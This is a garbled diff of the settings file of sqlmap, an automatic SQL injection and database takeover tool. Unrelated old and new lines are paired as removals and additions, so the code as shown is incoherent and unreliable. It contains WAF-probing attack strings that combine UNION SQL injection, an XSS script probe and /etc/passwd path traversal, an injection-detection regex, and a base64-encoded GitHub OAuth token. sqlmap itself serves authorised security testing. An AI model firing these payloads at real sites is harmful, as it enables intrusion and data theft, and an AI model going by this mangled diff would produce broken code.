 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 import logging
 import os
 import re
 import subprocess
 import string
 import sys
 import types
 from lib.core.datatype import AttribDict
 from lib.core.enums import DBMS
 from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import OS
 from lib.core.revision import getRevisionNumber
-# sqlmap version and site
+# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION            = "0.6.3"
+VERSION = "1.0.6.0"
-VERSION_STRING     = "sqlmap/%s" % VERSION
+REVISION = getRevisionNumber()
-SITE               = "http://sqlmap.sourceforge.net"
+STABLE = VERSION.count('.') <= 2
 VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
 DESCRIPTION = "automatic SQL injection and database takeover tool"
 SITE = "http://sqlmap.org"
 ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
 GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
 GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
-# sqlmap logger
+# colorful banner
-logging.addLevelName(9, "TRAFFIC OUT")
+BANNER = """\033[01;33m         _
-logging.addLevelName(8, "TRAFFIC IN")
+ ___ ___| |_____ ___ ___  \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
-LOGGER             = logging.getLogger("sqlmapLog")
+|_ -| . | |     | .'| . |
-LOGGER_HANDLER     = logging.StreamHandler(sys.stdout)
+|___|_  |_|_|_|_|__,|  _|
-FORMATTER          = logging.Formatter("[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S")
+      |_|           |_|   \033[0m\033[4;37m%s\033[0m\n
 """ % ((31 + hash(VERSION) % 6) if not STABLE else 30, VERSION_STRING.split('/')[-1], SITE)
-LOGGER_HANDLER.setFormatter(FORMATTER)
+# Minimum distance of ratio from kb.matchRatio to result in True
-LOGGER.addHandler(LOGGER_HANDLER)
+DIFF_TOLERANCE = 0.05
-LOGGER.setLevel(logging.WARN)
+CONSTANT_RATIO = 0.9
-# Url to update Microsoft SQL Server XML versions file from
+# Ratio used in heuristic check for WAF/IDS/IPS protected targets
-MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
+IDS_WAF_CHECK_RATIO = 0.5
-# Url to update sqlmap from
+# Timeout used in heuristic check for WAF/IDS/IPS protected targets
-SQLMAP_VERSION_URL = "%s/doc/VERSION" % SITE
+IDS_WAF_CHECK_TIMEOUT = 10
 SQLMAP_SOURCE_URL  = "http://downloads.sourceforge.net/sqlmap/sqlmap-%s.zip"
-# Database managemen system specific variables
+# Lower and upper values for match ratio in case of stable page
-MSSQL_SYSTEM_DBS  = ( "Northwind", "model", "msdb", "pubs", "tempdb" )
+LOWER_RATIO_BOUND = 0.02
-MYSQL_SYSTEM_DBS  = ( "information_schema", "mysql" )                   # Before MySQL 5.0 only "mysql"
+UPPER_RATIO_BOUND = 0.98
 PGSQL_SYSTEM_DBS  = ( "information_schema", "pg_catalog" )
 ORACLE_SYSTEM_DBS = ( "SYSTEM", "SYSAUX" )                              # These are TABLESPACE_NAME
-MSSQL_ALIASES     = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ]
+# Markers for special cases when parameter values contain html encoded characters
-MYSQL_ALIASES     = [ "mysql", "my" ]
+PARAMETER_AMP_MARKER = "__AMP__"
-PGSQL_ALIASES     = [ "postgresql", "postgres", "pgsql", "psql", "pg" ]
+PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
-ORACLE_ALIASES    = [ "oracle", "orcl", "ora", "or" ]
+BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__"
 PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
 PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
 URI_QUESTION_MARKER = "__QUESTION_MARK__"
 ASTERISK_MARKER = "__ASTERISK_MARK__"
 REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
 BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
-SUPPORTED_DBMS    = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES
+RANDOM_INTEGER_MARKER = "[RANDINT]"
 RANDOM_STRING_MARKER = "[RANDSTR]"
-# TODO: port to command line/configuration file options?
+PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
-SECONDS           = 5
+CHAR_INFERENCE_MARK = "%c"
-RETRIES           = 3
+PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
 # Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
 SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>[\w.]+)\b"
 # Regular expression used for recognition of textual content-type
 TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
 # Regular expression used for recognition of generic permission messages
 PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
 # Regular expression used for recognition of generic maximum connection messages
 MAX_CONNECTIONS_REGEX = r"max.+connections"
 # Regular expression used for extracting results from Google search
 GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&amp;cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
 # Regular expression used for extracting results from DuckDuckGo search
 DUCKDUCKGO_REGEX = r'"u":"([^"]+)'
 # Regular expression used for extracting results from Disconnect Search
 DISCONNECT_SEARCH_REGEX = r'<p class="url wrapword">([^<]+)</p>'
 # Dummy user agent for search (if default one returns different results)
 DUMMY_SEARCH_USER_AGENT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0"
 # Regular expression used for extracting content from "textual" tags
 TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P<result>[^<]+)"
 # Regular expression used for recognition of IP addresses
 IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
 # Regular expression used for recognition of generic "your ip has been blocked" messages
 BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)"
 # Dumping characters used in GROUP_CONCAT MySQL technique
 CONCAT_ROW_DELIMITER = ','
 CONCAT_VALUE_DELIMITER = '|'
 # Coefficient used for a time-based query delay checking (must be >= 7)
 TIME_STDEV_COEFF = 7
 # Minimum response time that can be even considered as delayed (not a complete requirement)
 MIN_VALID_DELAYED_RESPONSE = 0.5
 # Standard deviation after which a warning message should be displayed about connection lags
 WARN_TIME_STDEV = 0.5
 # Minimum length of usable union injected response (quick defense against substr fields)
 UNION_MIN_RESPONSE_CHARS = 10
 # Coefficient used for a union-based number of columns checking (must be >= 7)
 UNION_STDEV_COEFF = 7
 # Length of queue for candidates for time delay adjustment
 TIME_DELAY_CANDIDATES = 3
 # Default value for HTTP Accept header
 HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
 # Default value for HTTP Accept-Encoding header
 HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate"
 # Default timeout for running commands over backdoor
 BACKDOOR_RUN_CMD_TIMEOUT = 5
 # Number of seconds to wait for thread finalization at program end
 THREAD_FINALIZATION_TIMEOUT = 1
 # Maximum number of techniques used in inject.py/getValue() per one value
 MAX_TECHNIQUES_PER_VALUE = 2
 # In case of missing piece of partial union dump, buffered array must be flushed after certain size
 MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
 # Suffix used for naming meta databases in DBMS(es) without explicit database name
 METADB_SUFFIX = "_masterdb"
 # Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt)
 PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3
 # Minimum time response set needed for time-comparison based on standard deviation
 MIN_TIME_RESPONSES = 30
 # Minimum comparison ratio set needed for searching valid union column number based on standard deviation
 MIN_UNION_RESPONSES = 5
 # After these number of blanks at the end inference should stop (just in case)
 INFERENCE_BLANK_BREAK = 10
 # Use this replacement character for cases when inference is not able to retrieve the proper character value
 INFERENCE_UNKNOWN_CHAR = '?'
 # Character used for operation "greater" in inference
 INFERENCE_GREATER_CHAR = ">"
 # Character used for operation "equals" in inference
 INFERENCE_EQUALS_CHAR = "="
 # Character used for operation "not-equals" in inference
 INFERENCE_NOT_EQUALS_CHAR = "!="
 # String used for representation of unknown DBMS
 UNKNOWN_DBMS = "Unknown"
 # String used for representation of unknown DBMS version
 UNKNOWN_DBMS_VERSION = "Unknown"
 # Dynamicity mark length used in dynamicity removal engine
 DYNAMICITY_MARK_LENGTH = 32
 # Dummy user prefix used in dictionary attack
 DUMMY_USER_PREFIX = "__dummy__"
 # Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
 DEFAULT_PAGE_ENCODING = "iso-8859-1"
 # URL used in dummy runs
 DUMMY_URL = "http://foo/bar?id=1"
 # System variables
 IS_WIN = subprocess.mswindows
 # The name of the operating system dependent module imported. The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos'
 PLATFORM = os.name
 PYVERSION = sys.version.split()[0]
 # DBMS system databases
 MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
 MYSQL_SYSTEM_DBS = ("information_schema", "mysql")                   # Before MySQL 5.0 only "mysql"
 PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast")
 ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB")                      # These are TABLESPACE_NAME
 SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
 ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\
                        "MSysAccessXML", "MSysModules", "MSysModules2")
 FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\
                        "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\
                        "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\
                        "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\
                        "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\
                        "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
 MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
 SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
 DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
                   "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
 HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
 MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
 MYSQL_ALIASES = ("mysql", "my")
 PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg")
 ORACLE_ALIASES = ("oracle", "orcl", "ora", "or")
 SQLITE_ALIASES = ("sqlite", "sqlite3")
 ACCESS_ALIASES = ("msaccess", "access", "jet", "microsoft access")
 FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb")
 MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
 SYBASE_ALIASES = ("sybase", "sybase sql server")
 DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
 HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
 DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
 SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
 SUPPORTED_OS = ("linux", "windows")
 DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
 USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
 REFERER_ALIASES = ("ref", "referer", "referrer")
 HOST_ALIASES = ("host",)
 HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
 # Names that can't be used to name files on Windows OS
 WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
 # Items displayed in basic help (-h) output
 BASIC_HELP_ITEMS = (
                        "url",
                        "googleDork",
                        "data",
                        "cookie",
                        "randomAgent",
                        "proxy",
                        "testParameter",
                        "dbms",
                        "level",
                        "risk",
                        "tech",
                        "getAll",
                        "getBanner",
                        "getCurrentUser",
                        "getCurrentDb",
                        "getPasswordHashes",
                        "getTables",
                        "getColumns",
                        "getSchema",
                        "dumpTable",
                        "dumpAll",
                        "db",
                        "tbl",
                        "col",
                        "osShell",
                        "osPwn",
                        "batch",
                        "checkTor",
                        "flushSession",
                        "tor",
                        "sqlmapShell",
                        "wizard",
                   )
 # String representation for NULL value
 NULL = "NULL"
 # String representation for blank ('') value
 BLANK = "<blank>"
 # String representation for current database
 CURRENT_DB = "CD"
 # Regular expressions used for finding file paths in error messages
 FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w.\\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
 # Regular expressions used for parsing error messages (--parse-errors)
 ERROR_PARSING_REGEXES = (
                          r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
                          r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
                          r"<li>Error Type:<br>(?P<result>.+?)</li>",
                          r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
                          r"(?m)^\s*\[[^\n]+(ODBC|JDBC)[^\n]+\](?P<result>[^\]]+in query expression[^\n]+)$"
                        )
 # Regular expression used for parsing charset info from meta html headers
 META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'
 # Regular expression used for parsing refresh info from meta html headers
 META_REFRESH_REGEX = r'(?si)<head>(?!.*?<noscript.*?</head).*?<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
 # Regular expression used for parsing empty fields in tested form data
 EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
 # Reference: http://www.cs.ru.nl/bachelorscripties/2010/Martin_Devillers___0437999___Analyzing_password_strength.pdf
 COMMON_PASSWORD_SUFFIXES = ("1", "123", "2", "12", "3", "13", "7", "11", "5", "22", "23", "01", "4", "07", "21", "14", "10", "06", "08", "8", "15", "69", "16", "6", "18")
 # Reference: http://www.the-interweb.com/serendipity/index.php?/archives/94-A-brief-analysis-of-40,000-leaked-MySpace-passwords.html
 COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "@")
 # Splitter used between requests in WebScarab log files
 WEBSCARAB_SPLITTER = "### Conversation"
 # Splitter used between requests in BURP log files
 BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
 # Regex used for parsing XML Burp saved history items
 BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
 # Encoding used for Unicode data
 UNICODE_ENCODING = "utf8"
 # Reference: http://www.w3.org/Protocols/HTTP/Object_Headers.html#uri
 URI_HTTP_HEADER = "URI"
 # Uri format which could be injectable (e.g. www.site.com/id82)
 URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
 # Regex used for masking sensitive data
 SENSITIVE_DATA_REGEX = "(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
 # Maximum number of threads (avoiding connection issues and/or DoS)
 MAX_NUMBER_OF_THREADS = 10
 # Minimum range between minimum and maximum of statistical set
 MIN_STATISTICAL_RANGE = 0.01
 # Minimum value for comparison ratio
 MIN_RATIO = 0.0
 # Maximum value for comparison ratio
 MAX_RATIO = 1.0
 # Character used for marking injectable position inside provided data
 CUSTOM_INJECTION_MARK_CHAR = '*'
 # Other way to declare injection position
 INJECT_HERE_MARK = '%INJECT HERE%'
 # Minimum chunk length used for retrieving data over error based payloads
 MIN_ERROR_CHUNK_LENGTH = 8
 # Maximum chunk length used for retrieving data over error based payloads
 MAX_ERROR_CHUNK_LENGTH = 1024
 # Do not escape the injected statement if it contains any of the following SQL keywords
 EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
 # Mark used for replacement of reflected values
 REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
 # Regular expression used for replacing border non-alphanum characters
 REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
 # Regular expression used for replacing non-alphanum characters
 REFLECTED_REPLACEMENT_REGEX = r".+"
 # Maximum number of alpha-numerical parts in reflected regex (for speed purposes)
 REFLECTED_MAX_REGEX_PARTS = 10
 # Chars which can be used as a failsafe values in case of too long URL encoding value
 URLENCODE_FAILSAFE_CHARS = "()|,"
 # Maximum length of URL encoded value after which failsafe procedure takes away
 URLENCODE_CHAR_LIMIT = 2000
 # Default schema for Microsoft SQL Server DBMS
 DEFAULT_MSSQL_SCHEMA = "dbo"
 # Display hash attack info every mod number of items
 HASH_MOD_ITEM_DISPLAY = 11
 # Maximum integer value
 MAX_INT = sys.maxint
 # Options that need to be restored in multiple targets run mode
 RESTORE_MERGED_OPTIONS = ("col", "db", "dnsName", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")
 # Parameters to be ignored in detection phase (upper case)
 IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN")
 # Regular expression used for recognition of ASP.NET control parameters
 ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$"
 # Prefix for Google analytics cookie names
 GOOGLE_ANALYTICS_COOKIE_PREFIX = "__UTM"
 # Prefix for configuration overriding environment variables
 SQLMAP_ENVIRONMENT_PREFIX = "SQLMAP_"
 # Turn off resume console info to avoid potential slowdowns
 TURN_OFF_RESUME_INFO_LIMIT = 20
 # Strftime format for results file used in multiple target mode
 RESULTS_FILE_FORMAT = "results-%m%d%Y_%I%M%p.csv"
 # Official web page with the list of Python supported codecs
 CODECS_LIST_PAGE = "http://docs.python.org/library/codecs.html#standard-encodings"
 # Simple regular expression used to distinguish scalar from multiple-row commands (not sole condition)
 SQL_SCALAR_REGEX = r"\A(SELECT(?!\s+DISTINCT\(?))?\s*\w*\("
 # Option/switch values to ignore during configuration save
 IGNORE_SAVE_OPTIONS = ("saveConfig",)
 # IP address of the localhost
 LOCALHOST = "127.0.0.1"
 # Default port used by Tor
 DEFAULT_TOR_SOCKS_PORT = 9050
 # Default ports used in Tor proxy bundles
 DEFAULT_TOR_HTTP_PORTS = (8123, 8118)
 # Percentage below which comparison engine could have problems
 LOW_TEXT_PERCENT = 20
 # These MySQL keywords can't go (alone) into versioned comment form (/*!...*/)
 # Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html
 IGNORE_SPACE_AFFECTED_KEYWORDS = ("CAST", "COUNT", "EXTRACT", "GROUP_CONCAT", "MAX", "MID", "MIN", "SESSION_USER", "SUBSTR", "SUBSTRING", "SUM", "SYSTEM_USER", "TRIM")
 LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"
 # After this number of misses reflective removal mechanism is turned off (for speed up reasons)
 REFLECTIVE_MISS_THRESHOLD = 20
 # Regular expression used for extracting HTML title
 HTML_TITLE_REGEX = "<title>(?P<result>[^<]+)</title>"
 # Table used for Base64 conversion in WordPress hash cracking routine
 ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
 PICKLE_REDUCE_WHITELIST = (types.BooleanType, types.DictType, types.FloatType, types.IntType, types.ListType, types.LongType, types.NoneType, types.StringType, types.TupleType, types.UnicodeType, types.XRangeType, type(AttribDict()), type(set()))
 # Chars used to quickly distinguish if the user provided tainted parameter values
 DUMMY_SQL_INJECTION_CHARS = ";()'"
 # Simple check against dummy users
 DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
 # Extensions skipped by crawler
 CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
 # Patterns often seen in HTTP headers containing custom injection marking character
 PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
 # Template used for common table existence check
 BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
 # Template used for common column existence check
 BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
 # Payload used for checking of existence of IDS/WAF (dummier the better)
 IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/../../../etc/passwd"
 # Data inside shellcodeexec to be filled with random string
 SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
 # Vectors used for provoking specific WAF/IDS/IPS behavior(s)
 WAF_ATTACK_VECTORS = (
                        "",  # NIL
                        "search=<script>alert(1)</script>",
                        "file=../../../../etc/passwd",
                        "q=<invalid>foobar",
                        "id=1 %s" % IDS_WAF_CHECK_PAYLOAD
                     )
 # Used for status representation in dictionary attack phase
 ROTATING_CHARS = ('\\', '|', '|', '/', '-')
 # Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
 BIGARRAY_CHUNK_SIZE = 1024 * 1024
 # Maximum number of socket pre-connects
 SOCKET_PRE_CONNECT_QUEUE_SIZE = 3
 # Only console display last n table rows
 TRIM_STDOUT_DUMP_SIZE = 256
 # Reference: http://stackoverflow.com/a/3168436
 # Reference: https://support.microsoft.com/en-us/kb/899149
 DUMP_FILE_BUFFER_SIZE = 1024
 # Parse response headers only first couple of times
 PARSE_HEADERS_LIMIT = 3
 # Step used in ORDER BY technique used for finding the right number of columns in UNION query injections
 ORDER_BY_STEP = 10
 # Maximum number of times for revalidation of a character in time-based injections
 MAX_TIME_REVALIDATION_STEPS = 5
 # Characters that can be used to split parameter values in provided command line (e.g. in --tamper)
 PARAMETER_SPLITTING_REGEX = r'[,|;]'
 # Regular expression describing possible union char value (e.g. used in --union-char)
 UNION_CHAR_REGEX = r'\A\w+\Z'
 # Attribute used for storing original parameter value in special cases (e.g. POST)
 UNENCODED_ORIGINAL_VALUE = 'original'
 # Common column names containing usernames (used for hash cracking in some cases)
 COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor')
 # Default delimiter in GET/POST values
 DEFAULT_GET_POST_DELIMITER = '&'
 # Default delimiter in cookie values
 DEFAULT_COOKIE_DELIMITER = ';'
 # Unix timestamp used for forcing cookie expiration when provided with --load-cookies
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
 # Github OAuth token used for creating an automatic Issue for unhandled exceptions
 GITHUB_REPORT_OAUTH_TOKEN = "YzNkYTgyMTdjYzdjNjZjMjFjMWE5ODI5OGQyNzk2ODM1M2M0MzUyOA=="
 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32
 # Number of retries for unsuccessful HashDB flush attempts
 HASHDB_FLUSH_RETRIES = 3
 # Number of retries for unsuccessful HashDB end transaction attempts
 HASHDB_END_TRANSACTION_RETRIES = 3
 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
 HASHDB_MILESTONE_VALUE = "ERqvmQHalF"  # "".join(random.sample(string.ascii_letters, 10))
 # Warn user of possible delay due to large page dump in full UNION query injections
 LARGE_OUTPUT_THRESHOLD = 1024 ** 2
 # On huge tables there is a considerable slowdown if every row retrieval requires ORDER BY (most noticable in table dumping using ERROR injections)
 SLOW_ORDER_COUNT_THRESHOLD = 10000
 # Give up on hash recognition if nothing was found in first given number of rows
 HASH_RECOGNITION_QUIT_THRESHOLD = 10000
 # Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce
 MAX_SINGLE_URL_REDIRECTIONS = 4
 # Maximum total number of redirections (regardless of URL) - before assuming we're in a loop
 MAX_TOTAL_REDIRECTIONS = 10
 # Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm
 MAX_DNS_LABEL = 63
 # Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
